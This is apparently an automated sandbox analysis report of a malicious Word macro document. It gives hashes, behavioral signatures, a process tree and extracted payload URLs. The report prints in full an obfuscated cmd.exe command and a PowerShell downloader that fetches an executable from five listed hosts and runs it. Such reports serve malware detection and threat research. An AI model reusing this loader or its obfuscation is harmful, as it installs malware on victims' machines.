Analysis
- max time kernel: 132s
- max time network: 124s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-05-2024 08:52
Behavioral task: behavioral1
- Sample: 599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc
- Resource: win7-20240508-en
Behavioral task: behavioral2
- Sample: 599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc
- Resource: win10v2004-20240426-en
General
- Target: 599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc
- Size: 72KB
- MD5: 599113dce8c83987e7f0728ab5094c0f
- SHA1: dd68ecad930b13b9aae7fc2a1cc8d71fde698d77
- SHA256: 3bf26b612f3b764439cc3e44e5bde176d7febce6acb7756de8f0e9b34223a28e
- SHA512: 51a297d72d3d79b2a49f47bcbaa2353ffa2a406265c77e134b59e990eb14fab9f3bdf2b786e6fac1f2d6171b9e7c1149f8fc6437e5160e8442ef34b0ad4e20c0
- SSDEEP: 768:npJcaUitGAlmrJpmxlzC+w99NB38+1ove9A8pw8jZlerbc2:nptJlmrJpmxlRw99NB38+ave9ANT
Malware Config
Extracted
http://grupoperfetto.com.br/k0K5MRB
http://pasoprage.nl/CYcS488Bs
http://stoobb.nl/Hlathh5I
http://psselection.com/u2nU7nDwy5
http://oooka.biz/o0tiZ3XfbW
Signatures

- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 5048 | 2996 | cmd.exe | WINWORD.EXE

- Blocklisted process makes network request (6 IoCs)
  Processes: powershell.exe
  flow | pid | process
  27 | 3988 | powershell.exe
  28 | 3988 | powershell.exe
  36 | 3988 | powershell.exe
  37 | 3988 | powershell.exe
  46 | 3988 | powershell.exe
  48 | 3988 | powershell.exe

- An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
  Processes: cmd.exe
  pid | process
  5048 | cmd.exe

- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: WINWORD.EXE
  pid | process
  2996 | WINWORD.EXE
  2996 | WINWORD.EXE

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe
  pid | process
  3988 | powershell.exe
  3988 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 3988 | powershell.exe

- Suspicious use of SetWindowsHookEx (7 IoCs)
  Processes: WINWORD.EXE
  pid | process
  2996 | WINWORD.EXE (7 occurrences)

- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: WINWORD.EXE, cmd.exe
  description | pid | process | target process
  PID 2996 wrote to memory of 5048 | 2996 | WINWORD.EXE | cmd.exe
  PID 2996 wrote to memory of 5048 | 2996 | WINWORD.EXE | cmd.exe
  PID 5048 wrote to memory of 3988 | 5048 | cmd.exe | powershell.exe
  PID 5048 wrote to memory of 3988 | 5048 | cmd.exe | powershell.exe
Processes

- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 2996)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SYSTEM32\cmd.exe (PID 5048, child of 2996)
    Command line: cmd /V^:/C"^s^et ^pWA^h= ^ ^ ^ ^ ^ ^}^}^{hc^tac}^;^kaer^b;Uq^j$ ^m^et^I-e^k^ovn^I;)Uqj$ ,iT^h$(^el^iF^d^a^oln^w^o^D.kGK${yr^t{)nR^L$^ n^i i^Th^$(^hc^a^erof^;^'^e^xe.'+^ZL^W^$+'^\'^+cilbu^p^:vn^e^$^=Uq^j^$^;'^552^' ^=^ Z^LW$;)'^@^'(ti^l^pS.'W^bf^X3Z^i^t^0o/^z^i^b.^ak^ooo//:^pt^t^h@^5y^wDn7^Un2u/moc^.n^oitc^e^le^ss^p//:p^tt^h^@^I5h^h^ta^lH/^ln^.b^b^o^o^ts//^:ptt^h^@^sB8^8^4Sc^YC/ln^.^egar^po^s^a^p//^:p^t^th^@^BR^M^5^K^0^k/rb^.moc^.^ot^t^efr^epop^urg//:^p^tt^h^'^=nRL^$;tnei^lC^beW^.teN ^tc^e^j^b^o^-^wen=kG^K^$^ l^l^ehsrew^o^p&&^f^or /^L %N ^in (^36^3^;^-^1^;^0)d^o ^se^t 4^Iw^s=!4^Iw^s!!^pWA^h:~%N,1!&&^if %N=^=^0 c^a^l^l %4^Iw^s:^~^-^3^6^4%"
    - Process spawned unexpected child process
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3988, child of 5048)
      Command line: powershell $KGk=new-object Net.WebClient;$LRn='http://grupoperfetto.com.br/k0K5MRB@http://pasoprage.nl/CYcS488Bs@http://stoobb.nl/Hlathh5I@http://psselection.com/u2nU7nDwy5@http://oooka.biz/o0tiZ3XfbW'.Split('@');$WLZ = '255';$jqU=$env:public+'\'+$WLZ+'.exe';foreach($hTi in $LRn){try{$KGk.DownloadFile($hTi, $jqU);Invoke-Item $jqU;break;}catch{}}
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 245KB
  MD5: f883b260a8d67082ea895c14bf56dd56
  SHA1: 7954565c1f243d46ad3b1e2f1baf3281451fc14b
  SHA256: ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
  SHA512: d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- Filesize: 46KB
  MD5: ade8057d161aadc9cf93fb9f021766b2
  SHA1: e9d70d4a77bdbe859114d438667fa85d8122ffbf
  SHA256: 97b15a59f8d00a28a6f5c7d6d442068bd9afab8ce656872fb9110772787a40ae
  SHA512: 00f0149076a87cb6ecbb7cea0bf206c0ffa7e571b9eec9f0fe78d423adf9b40d82784b8d151dc7cb16d57460a5f8c70d4a24d597f73112d917ce9ec6d29c3c4c